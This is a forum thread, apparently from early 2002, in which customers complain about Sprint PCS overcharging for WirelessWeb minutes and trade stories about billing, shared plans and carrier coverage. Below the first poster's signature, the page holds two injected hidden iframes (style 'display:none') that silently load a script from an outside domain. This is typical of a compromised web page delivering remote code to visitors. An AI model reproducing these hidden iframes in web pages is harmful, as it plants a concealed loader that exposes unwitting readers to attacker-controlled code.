+ Reply to Thread

Angry Sprint & WirelessWeb minutes fiasco!!

Howdy:

Has anyone else had problems with signing up your phone with SprintPCS and them "forgetting" to add the WirelessWeb option?

This was the case for me...

Even though thier webpage (which is very very problematic!) showed that this option was enabled on my account, it was indeed not. In turn, I got charged for 229 WirelessWeb minutes "outside" of my plan at $.36 a minute.

I was *NOT* happy.

In the meantime, I contacted Sprint multiple times through e-mail to have some technician tell me to "wait until my next billing cycle" to make disputes about my bill. BS! I'm not gonna wait and rack up more charges..

I then CALLED Sprint this morning to get the skinny from thier billing department. Some unhelpful idiot basically gave me the run-around the whole time.

I told him that I bought the $500 phone to use the WirelessWeb almost exclusively, and do they have a plan that utilizes more PEAK time hours than offtime (who's gonna surf at 9pm? I'll be at home on my broadband connection then!). They then told me no, but if I signed up for the $79.00 plan, I would have 900 Peak hours to use the web.

After more hee-hawing, I finally agreed to the $79.99 plan. When I asked when the new pricing model would take effect, I was told on Feb. 6th! In the meantime, I'm stuck in this "off" state to where if I use the WirelessWeb, I'm charged up the wazoo!

I am beginning to want my AT&T Wireless again. This is total BS in my mind. Has anyone else had similar issues with Sprint? What was your resolution? Has anyone figured out a way to get the I300 to work on AT&T Wireless?

Do they indeed have any plans that allow for a large WirelessWeb amount and a mediocre-nominal cell (voice) amount?This is highway robbery in my mind.

Any suggestions? Comments? Ideas?

Please feel free to write on this thread, or e-mail me at: pdxwiredboy@attbi.com.

Thanks!

--= PDXWiredboy <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by PDXWiredboy; 01-11-2002 at 01:11 PM.

Sprint Customer Service Reps are IDIOTS

I can only sympathize with you, as I have experienced numerous headaches and fiascoes dealing with Sprint's reps. I've dealt with them numerous times on billing issues, equipment returns, equipment replacements, etc. In almost every instance, I have had to call back multiple times. Its not unusual to get a totally different response about the same topic from rep to rep to rep -- their training program must be a joke!

I highly recommend that you call back and pursue canceling your service. I've had to make this threat several times, and it usually results in my call being relayed to someone who actually understands these types of situations -- and someone who can usually take some corrective action to remedy the problem.

Good luck

PS: Why do I stick with Sprint, you ask? I like their equipment & network; certainly not for their customer support!

I had a similar experience when I added an AirCard 510 to my Sprint account. The Aircard looks like another phone on my plan (I have 3, you can add additional phones for $10/month and share the minute pool). Got my first bill and had been billed for about 500 minutes of usage, not against my plan, even thought I had plenty of minutes to spare. I called customer (no) service, but luckily spoke to someone with an IQ higher than room termperature, and it was taken care of immediately and has been correct ever since. Sprint does have a few good people, good luck trying to find them though.

I agree, I do not stay w/Sprint for thie customer service. I do like their phones, network and technology. My guess is that ALL the cell phone companies have crappy customer service.
    Carl

Originally posted by CarlGalgano
    when someone calls you, do all the phones ring?

Originally posted by mk3racer

when someone calls you, do all the phones ring?
    No. Each phone has an unique ESN and has it's own number. Even the Aircard 510 (a PCMCIA card for my laptop) has a phone number. I suppose the number could be given out and I could receive faxes on it.

I once had a BellSouth Mobility account and had a "car phone" in my car and had a handheld (back then the batteries did not last very long). So for $150 bucks, some guy cloned my number onto both phones. In that case, both phones rang.

What I have now is just like 3 different accounts, except, all my phone (actually my wife, mine and laptop0, all pull minutes from one mega plan.
    Carl

Man I am glad I read that post. I almost came close to being right there with you PDX.

I agree it's rare to find good quality customer service and it seems that this was set up to generate some quick revenue from those "forgetting" to request the Wireless web service.

Seems like if they were nice they'd let you use the service @ 36 cents up to the point where it would be the same as signing up for the month and then hit your minutes for the rest.

Again, if they were NICE.

Originally posted by CarlGalgano

No. Each phone has an unique ESN and has it's own number. Even the Aircard 510 (a PCMCIA card for my laptop) has a phone number. I suppose the number could be given out and I could receive faxes on it.

I once had a BellSouth Mobility account and had a "car phone" in my car and had a handheld (back then the batteries did not last very long). So for $150 bucks, some guy cloned my number onto both phones. In that case, both phones rang.

What I have now is just like 3 different accounts, except, all my phone (actually my wife, mine and laptop0, all pull minutes from one mega plan.
    Lemme tell you, if I could get my I300 on the AT&T network, I would.

I called them back this afternoon and spoke to someone who had less IQ than my 5 year old neice. They told me that I would require consultation with thier billing department if I was going to make a "further stink by e-mail".

Needless to say, I've been more than polite and respectful to thier service department. In a former life, I used to work in tech support (many a year ago), and know the hell they have to go through.

However, that is no excuse for piss poor customer service and a billing plan that makes little-to-no sense. I just wanted to know what *I* was doing wrong -- but come to find out I wasn't.

Too bad there isn't any pure data service providers still around. I might be able to get service from them, and then go with Sprint for the Voice service. No such luck, however.

Just makes no sense.

Glad to know I'm not the only one who's experienced the wrath of Sprint ignorance.

-= PDXWiredboy

Actually, if what you want the phone for is almost exclusive wireless web usage....then you can sign up to be a sprint developer and get unlimited wireless web minutes and something like 20 voice minutes.

Downside to this is that all data connections are not counted as wireless web, just the time that you use their text only WAP browser.

Anyhow, the developer plan is $49.95 a month.

Keith

Originally posted by PDXWiredboy

Lemme tell you, if I could get my I300 on the AT&T network, I would.

I feel your pain, I have had my run ins with Sprint, but there is nothing in the world to get me back to AT&T. In the Atlanta area they really suck. Lots of places you can get a signal, but it is unusable. But since the phone "sees" an ATT sig, it will not switch over to Extended Area. In many other parts of the country I have traveled to, ATT worked fine, but not here. Plus they do NOT have any DATA services in metro Atlanta. With a metro area of 4 million, you'd think we were big enough. They told me they have no immediate plans to add data services to their piss poor network. Sprint isn't heaven, but ATT sure is closer to hell...... I feel better now.
    Carl